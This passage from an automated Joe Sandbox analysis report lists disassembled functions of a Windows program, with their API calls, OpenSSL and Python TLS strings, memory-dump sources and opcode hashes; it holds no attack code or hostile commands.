                                                                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                  • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                  • Instruction ID: acfef818fa757435a00dbfbc73a2c9f3f3a68c5db68a1fd3ca24e20c6487c443
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A416521A0C54285EB61BB64E8441BAA362FFA87A4FD00631DB9D43AD4DF3CD549CF50
                                                                                                                                                                                                                                  Function 00007FF72C65D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                  • Instruction ID: c0e9453daa5319c9a977e43f5a8ddc277bb9b255e9adbe2c55aa8a73e99b43f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52313E72609B8186EB619F60EC843EEB361FB94758F44443ADB4E47B99DF38D548CB20
                                                                                                                                                                                                                                  Function 00007FFBA43D4390 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                                  • Instruction ID: dd4e3a3a908a7739d5713eea0c3edfdd7a428d1f331bb13caad899e8db7a1a46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35311DB2A0AF81D6EB619F61E8803ED73A4FB94744F544439DA4E47BA4DF3CD6488710
                                                                                                                                                                                                                                  Function 00007FFBAA493318 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
                                                                                                                                                                                                                                  • Instruction ID: f050526e82ccbc195d0ba9e313e30faeba2fe7f558fb43b46e3c826efd282778
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56313EB260AA81C6EB618FA0E8C07ED7368FB85744F04447AEE4D47B95DF38D559C710
                                                                                                                                                                                                                                  Function 00007FFBA66A339C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                                  • Instruction ID: 4670f7950434127426fe264ad413e05b535d2eca140b54fea34bc098eb27c29c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06314CB260AB8186EB618F74E8503EE7375FB94B44F04543ADA4E97B94EF38D548CB10
                                                                                                                                                                                                                                  Function 00007FF72C675C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C45
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A909
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A92E
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C34
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EAA
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EBB
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675ECC
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                                                                  • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                  • Instruction ID: 7c87c2dfff1801238b98d4aec5a2674972c44497560309c1737eb14a2b8fdfe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D1D422A1824286E722FF21DC421B9A363FFA47A4FC48976DA0D47695DF3CE445CF60
                                                                                                                                                                                                                                  Function 00007FF72C66A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                  • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction ID: efd8a26337d1ab9ddb835e402724fb6bf05ce0f95ab9478cfb1275ebdcbd09d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F319336608B8186DB21DF25EC442AEB3A5FB98768F900535EA9D43B99DF3CC159CB10
                                                                                                                                                                                                                                  Function 00007FFBA6091CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                  • API String ID: 0-1194634662
                                                                                                                                                                                                                                  • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                  • Instruction ID: 06f5639a19cef5d93a92c05df5a6b3a05ed96a9d56caa249f78da0e6503d2293
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D19DE2F0A68291EB13DB35D8517A96BA2FB85F84F545032EE4C8BB96CE3DD541C310
                                                                                                                                                                                                                                  Function 00007FFBAA493E40 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007E3440ErrorLast
                                                                                                                                                                                                                                  • String ID: NOO$surrogatepass$unsupported address family
                                                                                                                                                                                                                                  • API String ID: 725305683-472101058
                                                                                                                                                                                                                                  • Opcode ID: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
                                                                                                                                                                                                                                  • Instruction ID: 4f689844c807fb8bf6625e2e64ab29f714ffb9c8c24333f559dbeb54ab64c76f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2301973ca244d9adc6b6ab578d2e372c8de1439fb0a9aba9528582346aaa0b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E81A3A2E0AA52C1EA568B31E4C427D63A8AF45B94F044175FE0D437A5EF3DE492C360
                                                                                                                                                                                                                                  Function 00007FF72C671874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                                                  • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                  • Instruction ID: 4a845607282e17f4a483a487e092a201656256254044ab6ab78e4d0b38d8c084
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBB1E622B1868241EE62EB219C011B9E362FB64BF4F945533D95D07B99EF3CE445CB10
                                                                                                                                                                                                                                  Function 00007FFBA6091EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                  • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                  • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                  • Instruction ID: 74ab04e0d0678676a8caa618e5aba0365c0e2541f49eb0f6b292baf1d60fc814
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1312D2E2F0AA9241EB229B71D4813BDAB92EF85F84F054032DE5D4BB85DE3DE5918700
                                                                                                                                                                                                                                  Function 00007FFBA66ABF74 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007A6091
                                                                                                                                                                                                                                  • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context$Python
                                                                                                                                                                                                                                  • API String ID: 1518032178-1888807747
                                                                                                                                                                                                                                  • Opcode ID: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
                                                                                                                                                                                                                                  • Instruction ID: 44471b4f74cf97a8fb2e3af1e8347c7c5f967cf031379eb00874c7a827f51366
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd1b8ea646ef9afa8d9b55c550e8d37b12c63986d5a7a861df86a7bcf2bbbd8b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98A162F5A0A64282EA629F3AEC545B97372FFA5F80B046435CE4E83B50DF3DE4459B40
                                                                                                                                                                                                                                  Function 00007FF72C675E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EAA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EBB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675ECC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755DC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
